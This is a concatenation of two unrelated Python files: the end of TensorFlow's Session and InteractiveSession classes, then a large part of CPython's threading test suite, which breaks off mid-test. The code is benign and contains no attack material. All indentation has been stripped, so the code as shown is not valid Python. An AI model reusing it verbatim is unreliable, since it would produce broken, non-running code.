and `tf.compat.v1.ReaderBase`. It is important to release
these resources when they are no longer required. To do this, either
invoke the `tf.Session.close` method on the session, or use
the session as a context manager. The following two examples are
equivalent:
```python
# Using the `close()` method.
sess = tf.compat.v1.Session()
sess.run(...)
sess.close()
# Using the context manager.
with tf.compat.v1.Session() as sess:
sess.run(...)
```
The
[`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
protocol buffer exposes various configuration options for a
session. For example, to create a session that uses soft constraints
for device placement, and log the resulting placement decisions,
create a session as follows:
```python
# Launch the graph in a session that allows soft device placement and
# logs the placement decisions.
sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(
allow_soft_placement=True,
log_device_placement=True))
```
"""
def __init__(self, target='', graph=None, config=None):
"""Creates a new TensorFlow session.
If no `graph` argument is specified when constructing the session,
the default graph will be launched in the session. If you are
using more than one graph (created with `tf.Graph()`) in the same
process, you will have to use different sessions for each graph,
but each graph can be used in multiple sessions. In this case, it
is often clearer to pass the graph to be launched explicitly to
the session constructor.
Args:
target: (Optional.) The execution engine to connect to. Defaults to using
an in-process engine. See
[Distributed TensorFlow](https://tensorflow.org/deploy/distributed) for
more examples.
graph: (Optional.) The `Graph` to be launched (described above).
config: (Optional.) A
[`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
protocol buffer with configuration options for the session.
"""
super(Session, self).__init__(target, graph, config=config)
# NOTE(mrry): Create these on first `__enter__` to avoid a reference cycle.
self._default_graph_context_manager = None
self._default_session_context_manager = None
def __enter__(self):
if self._default_graph_context_manager is None:
self._default_graph_context_manager = self.graph.as_default()
else:
raise RuntimeError('Session context managers are not re-entrant. '
'Use `Session.as_default()` if you want to enter '
'a session multiple times.')
if self._default_session_context_manager is None:
self._default_session_context_manager = self.as_default()
self._default_graph_context_manager.__enter__()
return self._default_session_context_manager.__enter__()
def __exit__(self, exec_type, exec_value, exec_tb):
if exec_type is errors.OpError:
logging.error('Session closing due to OpError: %s', (exec_value,))
try:
self._default_session_context_manager.__exit__(exec_type, exec_value,
exec_tb)
except RuntimeError as error:
if error == exec_value:
# NOTE(skyewm): for some reason, in Python3,
# _default_session_context_manager.__exit__ will re-raise the "not
# re-entrant" exception raised in __enter__ above (note that if we're
# here, we're in the outer session context manager, since __exit__ is
# not called when __enter__ raises an exception). We still want to
# continue cleaning up this context manager before the exception is
# further propagated, so we ignore it here (note that it'll continue
# being propagated after this method completes).
pass
else:
raise
self._default_graph_context_manager.__exit__(exec_type, exec_value, exec_tb)
self._default_session_context_manager = None
self._default_graph_context_manager = None
# If we are closing due to an exception, set a time limit on our Close() to
# avoid blocking forever.
# TODO(b/120204635) remove this when deadlock is fixed.
if exec_type:
close_thread = threading.Thread(
name='SessionCloseThread', target=self.close)
close_thread.daemon = True
close_thread.start()
close_thread.join(30.0)
if close_thread.is_alive():
logging.error(
'Session failed to close after 30 seconds. Continuing after this '
'point may leave your program in an undefined state.')
else:
self.close()
@staticmethod
def reset(target, containers=None, config=None):
"""Resets resource containers on `target`, and close all connected sessions.
A resource container is distributed across all workers in the
same cluster as `target`. When a resource container on `target`
is reset, resources associated with that container will be cleared.
In particular, all Variables in the container will become undefined:
they lose their values and shapes.
NOTE:
(i) reset() is currently only implemented for distributed sessions.
(ii) Any sessions on the master named by `target` will be closed.
If no resource containers are provided, all containers are reset.
Args:
target: The execution engine to connect to.
containers: A list of resource container name strings, or `None` if all of
all the containers are to be reset.
config: (Optional.) Protocol buffer with configuration options.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
resetting containers.
"""
if target is not None:
target = compat.as_bytes(target)
if containers is not None:
containers = [compat.as_bytes(c) for c in containers]
else:
containers = []
tf_session.TF_Reset(target, containers, config)
@tf_export(v1=['InteractiveSession'])
class InteractiveSession(BaseSession):
"""A TensorFlow `Session` for use in interactive contexts, such as a shell.
The only difference with a regular `Session` is that an `InteractiveSession`
installs itself as the default session on construction.
The methods `tf.Tensor.eval`
and `tf.Operation.run`
will use that session to run ops.
This is convenient in interactive shells and [IPython
notebooks](http://ipython.org), as it avoids having to pass an explicit
`Session` object to run ops.
For example:
```python
sess = tf.compat.v1.InteractiveSession()
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
# We can just use 'c.eval()' without passing 'sess'
print(c.eval())
sess.close()
```
Note that a regular session installs itself as the default session when it
is created in a `with` statement. The common usage in non-interactive
programs is to follow that pattern:
```python
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
with tf.compat.v1.Session():
# We can also use 'c.eval()' here.
print(c.eval())
```
"""
_count_lock = threading.Lock()
_active_session_count = 0 # GUARDED_BY(_count_lock)
def __init__(self, target='', graph=None, config=None):
"""Creates a new interactive TensorFlow session.
If no `graph` argument is specified when constructing the session,
the default graph will be launched in the session. If you are
using more than one graph (created with `tf.Graph()`) in the same
process, you will have to use different sessions for each graph,
but each graph can be used in multiple sessions. In this case, it
is often clearer to pass the graph to be launched explicitly to
the session constructor.
Args:
target: (Optional.) The execution engine to connect to. Defaults to using
an in-process engine.
graph: (Optional.) The `Graph` to be launched (described above).
config: (Optional) `ConfigProto` proto used to configure the session.
"""
if not config:
# If config is not provided, choose some reasonable defaults for
# interactive use:
#
# - Grow GPU memory as needed at the cost of fragmentation.
gpu_options = config_pb2.GPUOptions(allow_growth=True)
config = config_pb2.ConfigProto(gpu_options=gpu_options)
# Interactive sessions always place pruned graphs.
config.graph_options.place_pruned_graph = True
super(InteractiveSession, self).__init__(target, graph, config)
with InteractiveSession._count_lock:
if InteractiveSession._active_session_count > 0:
warnings.warn('An interactive session is already active. This can '
'cause out-of-memory errors in some cases. You must '
'explicitly call `InteractiveSession.close()` to release '
'resources held by the other session(s).')
InteractiveSession._active_session_count += 1
# NOTE(mrry): We do not use `Session._closed` here because it has unhelpful
# semantics (in particular, it is not set to true if `Session.close()` is
# called on a session that has not been "opened" by running a step) and we
# cannot change those semantics without breaking existing code.
self._explicitly_closed = False
self._default_session = self.as_default()
self._default_session.enforce_nesting = False
self._default_session.__enter__()
self._explicit_graph = graph
if self._explicit_graph is not None:
self._default_graph = graph.as_default()
self._default_graph.enforce_nesting = False
self._default_graph.__enter__()
def close(self):
"""Closes an `InteractiveSession`."""
super(InteractiveSession, self).close()
with InteractiveSession._count_lock:
if not self._explicitly_closed:
InteractiveSession._active_session_count -= 1
self._explicitly_closed = True
else:
return
if self._explicit_graph is not None:
self._default_graph.__exit__(None, None, None)
self._default_graph = None
self._default_session.__exit__(None, None, None)
self._default_session = None
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import (verbose, import_module, cpython_only,
requires_type_collecting)
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
_thread = import_module('_thread')
threading = import_module('threading')
import time
import unittest
import weakref
import os
import subprocess
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
_thread.start_new_thread(f, ())
done.wait()
self.assertIsNotNone(ident[0])
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256kB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1MB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_deamon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
self.addCleanup(t.join)
pid = os.fork()
if pid == 0:
os._exit(1 if t.is_alive() else 0)
else:
pid, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=5), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
in_f = open(os.__file__, 'rb')
stuff = in_f.read(200)
null_f = open(os.devnull, 'wb')
null_f.write(stuff)
time.sleep(random.random() / 1995)
null_f.close()
in_f.close()
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(0)
else:
os._exit(1)
else:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import threading
import time
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
time.sleep(0.05)
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import threading
import time
class Sleeper:
def __del__(self):
time.sleep(0.05)
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
time.sleep(0.05)
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = r"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep(10)
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
@unittest.skipUnless(sys.platform == 'darwin' and test.support.python_is_optimized(),
'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
@requires_type_collecting
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
